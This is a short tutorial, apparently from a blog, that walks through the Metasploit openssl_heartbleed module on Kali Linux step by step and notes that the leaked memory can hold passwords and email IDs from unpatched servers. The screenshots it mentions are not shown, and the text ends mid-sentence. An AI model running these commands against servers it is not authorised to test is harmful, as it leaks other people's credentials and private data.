Metasploit -- The Bleeding Heart

HeartBleed is a OpenSSL cryptography vulnerability, Which was introduced in 2012 and publicly disclosed in 2014. Heartbleed can be exploited regardless of whether the vulnerable OpenSSL instance is running as a TLS (Transport Layer Security) server or client.

In this tutorial we will learn how to use this exploit HeartBleed in Metasploit on Kali Linux Environment.

 Open our terminal window and start Metasploit by using msfconsole command:

The screenshot is following:

Then we search for the HeartBleed auxiliary using search command:

search heartbleed
Screenshot of the output for the preceding command is following:

Then we are going to use the auxiliary using following command:

use auxiliary/scanner/ssl/openssl_heartbleed
The screenshot is following:

Now we see the options by using following command:

show options
The options of HeartBleed is showing in following screenshot:

Now we need to set the RHOSTS to our target IP using following command:

set RHOSTS x.x.xx
Screenshot is following:

Now one thing to do, we set the verbosity to true by using following command:

set verbose true
Now, we all set we just type run command to see the data.

This data even contains security info, like password. e-mail IDs, and many more.

This vulnerability is fixed but their are many web server owners did not updated their OpenSSL still. We can check if our server is effected with HeartBleed vulnerability or not in this site: